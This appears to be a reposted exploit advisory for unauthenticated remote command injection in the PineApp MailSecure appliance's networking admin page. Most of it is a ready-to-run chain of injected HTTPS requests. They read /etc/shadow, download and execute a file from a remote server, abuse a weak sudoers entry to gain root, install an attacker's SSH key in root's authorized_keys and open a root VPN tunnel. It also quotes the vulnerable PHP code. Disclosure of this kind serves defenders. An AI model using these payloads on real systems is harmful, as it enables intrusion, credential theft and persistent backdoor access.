PineApp MailSecure - Remote Command Execution


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 12:12 p.m.

FORMAT: Text only

SIZE: 6.4 kB

HITS: 2427

  1. -----------------------------------------------------------------
  2. It is possible execute any command bash as qmailq unprivilege user, sending
  3. only the following https request, without authentication.
  4. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
  5. To upload any file (script, binary, etc...) it is possible with wget
  6. command.
  7. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile
  8. Download and execute it is possible with this request:
  9. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile
  10. Details of bug:
  11. Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html
  12. ----------------snip-----------------
  13. <?
  14. $query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip'
  15. $nsserver"));
  16. foreach ($query as $line)
  17. if ($line)
  18. echo preg_replace("/\t/","&nbsp;&nbsp;&nbsp;",$line)."<br>\n";
  19. ?>
  20. ----------------snip-----------------
  21. Also it is possible make privilege escalation to root with a weak sudoers
  22. configuration, on /tmp/rc.firewall file. If you overwrite this file with
  23. this content:
  24. ---------
  25. #!/bin/bash
  26. $1
  27. ---------
  28. you must get a privileged backdoor.
  29. It is possible with the following request:
  30. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%23!/bin/bash'
  31. > /tmp/fileheader
  32. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'$1'
  33. > /tmp/filecode
  34. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv/tmp/rc.firewall
  35. /tmp/rc.firewall_
  36. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/fileheader
  37. /tmp/filecode > /tmp/rc.firewall
  38. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx
  39. /tmp/rc.firewall
  40. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/fileheader
  41. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/filecode
  42. And execute commands as root with:
  43. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx
  44. /tmp/rc.firewall 'whoami'
  45. With this, you can sent a private ssh key and get access by ssh service. To
  46. perform this you can make the following request:
  47. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70'
  48. > /tmp/key.pub
  49. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall
  50. 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'
  51. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall
  52. 'cp /root/.ssh/authorized_keys /tmp'
  53. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/authorized_keys
  54. /tmp/key.pub > /tmp/keys.pub
  55. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall
  56. 'mv /tmp/keys.pub /root/.ssh/authorized_keys'
  57. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall
  58. 'chown root:root /root/.ssh/authorized_keys'
  59. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'killall
  60. sshd'
  61. https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'sshd'
  62. This key have password: '1234'
  63. Now you can get access with ssh as root and up tun interface with the
  64. appliance with ssh client:
  65. ssh root@192.168.24.24 -p 7022 -w0:0 -i /home/ruben/key
  66. With this the attacker have a VPN on the same network segment of MailSecure
  67. appliance vulnerable.
  68. -----------------------------------------------------------------
  69. This I made a live demo of vulnerability, but don't revealed the
  70. manufacturer, then the bugs was not fixed.
  71. http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html
  72. Video demo will be release soon on my blog.
  73. Version affected:
  74. MailSecure <= 5099SK
  75. Credits:
  76. -----------
  77. Ruben Garrote GarcĂ­a
  78. rubengarrote [at] gmail [dot] com
  79. http://boken00.blogspot.com
  80. EDB Note:
  81. It seems 3.70 version has been patched against this.
  82. Later versions are probably vulnerable to this.

comments powered by Disqus